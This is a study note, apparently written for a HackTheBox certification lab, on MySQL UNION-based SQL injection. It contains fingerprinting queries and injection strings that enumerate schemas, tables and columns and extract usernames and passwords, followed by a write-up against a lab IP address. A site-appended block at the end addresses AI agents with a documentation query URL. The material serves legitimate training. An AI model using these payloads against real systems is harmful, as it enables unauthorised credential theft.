# Database Enumeration ## Payloads | Payload | When to Use | Expected Output | Wrong Output | | ------------------ | -------------------------------- | --------------------------------------------------- | --------------------------------------------------------- | | `SELECT @@version` | When we have full query output | MySQL Version 'i.e. `10.3.22-MariaDB-1ubuntu1`' | In MSSQL it returns MSSQL version. Error with other DBMS. | | `SELECT POW(1,1)` | When we only have numeric output | `1` | Error with other DBMS | | `SELECT SLEEP(5)` | Blind/No Output | Delays page response for 5 seconds and returns `0`. | Will not delay response with other DBMS | ## Schemata ### UNION ```sql cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ```

```sql cn' UNION select 1,database(),2,3-- - ```

> Note: we added a (where table\_schema='dev') condition to only return tables from the 'dev' database, otherwise we would get all tables in all databases, which can be many. ### TABLES ```sql cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - ``` > Note how we replaced the numbers '2' and '3' with 'TABLE\_NAME' and 'TABLE\_SCHEMA', to get the output of both columns in the same query.

### COLUMNS ```sql cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - ```

### Data ```sql cn' UNION select 1, username, password, 4 from dev.credentials-- - ``` > Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.

## WriteUp

``` http://83.136.252.13:54651/search.php?port_code= ##Send empty search cn ' union select 1,2,3,4-- - ##Union select by columns ```

``` cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ##View all and existing databases cn' UNION select 1,database(),2,3-- - ##View usage database ```

> This shows the database you are using > Note: we added a (where table\_schema='dev') condition to only return tables from the 'dev' database, otherwise we would get all tables in all databases, which can be many. Up Example ``` cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES-- - ##View the tables using by this database ```

``` cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- - ##View the columns of credentials table ```

``` cn' UNION select 1, username, password, 4 from ilfreight.users-- - ##This saw the info of columns username and password of table users in ilfreight database ``` > Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/sql-injection/exploitation/database-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.